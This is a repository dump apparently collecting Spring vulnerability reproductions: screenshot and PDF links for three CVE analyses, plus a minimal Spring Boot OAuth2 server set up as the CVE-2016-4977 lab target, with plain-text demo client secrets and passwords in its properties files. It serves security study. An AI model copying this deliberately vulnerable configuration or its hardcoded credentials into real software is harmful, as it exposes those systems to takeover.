-------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219232632661.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219233138950.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219233138950.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219233417903.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219233417903.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220010536341.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220010536341.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220010626981.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220010626981.png -------------------------------------------------------------------------------- 
/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220010854625.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220010854625.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220010924079.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220010924079.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220011027192.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220011027192.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220011825279.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220011825279.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220012116264.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220012116264.png 
-------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220012500083.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220012500083.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220012822337.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220012822337.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220013530679.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220013530679.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220013647485.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220013647485.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220013838006.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220013838006.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220014127250.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220014127250.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220014259943.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220014259943.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220014620317.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220014620317.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220014702074.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210220014702074.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.pdf: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.pdf -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/cve-2016-4977/spring-oauth2-sec-bug/src/main/java/com/example/DemoApplication.java: -------------------------------------------------------------------------------- 1 | package com.example; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | import org.springframework.security.oauth2.config.annotation.web.configuration.EnableAuthorizationServer; 6 | import org.springframework.security.oauth2.config.annotation.web.configuration.EnableResourceServer; 7 | import org.springframework.web.bind.annotation.RestController; 8 | /** Spring Boot entry point of the spring-oauth2-sec-bug demo; the enclosing directory name marks it as the reproduction target for CVE-2016-4977. The annotations stand up both an OAuth2 authorization server and a resource server in this single class; {@code @RestController} is present although the class declares no request-handler methods. Client id/secret and the user password are not set here but come from src/main/resources/application.properties, which commits plain-text demo credentials (acme / acmesecret / password) and is copied verbatim into target/classes. NOTE(review): presumably intentional for a local lab reproduction; treat the values as throwaway and keep this build off any shared network. */ 9 | @SpringBootApplication 10 | @RestController 11 | @EnableResourceServer 12 | @EnableAuthorizationServer 13 | public class DemoApplication { 14 | 15 | /** Boots the application; the command-line arguments are passed straight through to Spring Boot. */ public static void main(String[] args) { 16 | SpringApplication.run(DemoApplication.class, args); 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/cve-2016-4977/spring-oauth2-sec-bug/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | security.oauth2.client.clientId:acme 2 | security.oauth2.client.clientSecret:acmesecret 3 | security.oauth2.client.authorized-grant-types:authorization_code,refresh_token,password 4 | security.oauth2.client.scope:openid 5 | security.oauth2.client.registered-redirect-uri:http://localhost 6 | security.user.password:password -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/cve-2016-4977/spring-oauth2-sec-bug/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | 
security.oauth2.client.clientId:acme 2 | security.oauth2.client.clientSecret:acmesecret 3 | security.oauth2.client.authorized-grant-types:authorization_code,refresh_token,password 4 | security.oauth2.client.scope:openid 5 | security.oauth2.client.registered-redirect-uri:http://localhost 6 | security.user.password:password -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/cve-2016-4977/spring-oauth2-sec-bug/target/classes/com/example/DemoApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/cve-2016-4977/spring-oauth2-sec-bug/target/classes/com/example/DemoApplication.class -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/1.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/2.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/4.png -------------------------------------------------------------------------------- 
/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218194441152.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218194441152.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218194733254.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218194733254.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218200153046.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218200153046.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218201238194.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218201238194.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218201936295.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218201936295.png 
-------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218202011507.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218202011507.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218202450134.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218202450134.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218203221151.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218203221151.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218203901093.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218203901093.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218203953533.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218203953533.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218204058653.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218204058653.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218204423476.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218204423476.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218204746269.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218204746269.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218205407984.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218205407984.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218205644634.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218205644634.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218205752547.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218205752547.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210007792.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210007792.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210058692.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210058692.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210510086.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210510086.png -------------------------------------------------------------------------------- 
/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210700708.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210700708.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210826600.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/image-20210218210826600.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/t01d4c3b8e8b53a2fba.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.assets/t01d4c3b8e8b53a2fba.png -------------------------------------------------------------------------------- /Spring/CVE-2017-4971-spring/CVE-2017-4971分析.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-4971-spring/CVE-2017-4971分析.pdf -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218140900669.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218140900669.png -------------------------------------------------------------------------------- 
/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218140952456.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218140952456.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218141130874.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218141130874.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218141757004.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218141757004.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218141906222.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218141906222.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218142031222.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218142031222.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218142324101.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218142324101.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218142345087.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218142345087.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218142403072.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218142403072.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218143536948.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218143536948.png -------------------------------------------------------------------------------- 
/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218143749562.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218143749562.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218143913364.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218143913364.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144011160.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144011160.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144046479.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144046479.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144138429.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144138429.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144321822.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144321822.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144405693.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144405693.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144455906.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218144455906.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154218728.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154218728.png -------------------------------------------------------------------------------- 
/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154242121.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154242121.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154309595.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154309595.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154343073.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154343073.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154922515.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218154922515.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218155012734.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218155012734.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218155828334.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218155828334.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218155904249.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218155904249.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218155949892.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218155949892.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160152994.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160152994.png -------------------------------------------------------------------------------- 
/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160229390.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160229390.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160352066.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160352066.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160446520.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160446520.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160527668.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160527668.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160715149.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.assets/image-20210218160715149.png -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2017-8046-spring/complete/CVE-2017-8046分析.pdf -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/accessing-data-rest.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /Spring/CVE-2017-8046-spring/complete/build.gradle: -------------------------------------------------------------------------------- 1 | plugins { 2 | id 'org.springframework.boot' version '2.4.2' 3 | id 'io.spring.dependency-management' version '1.0.11.RELEASE' 4 | id 'java' 5 | } 6 | 7 | group = 'com.example' 8 | version = '0.0.1-SNAPSHOT' 9 | sourceCompatibility = 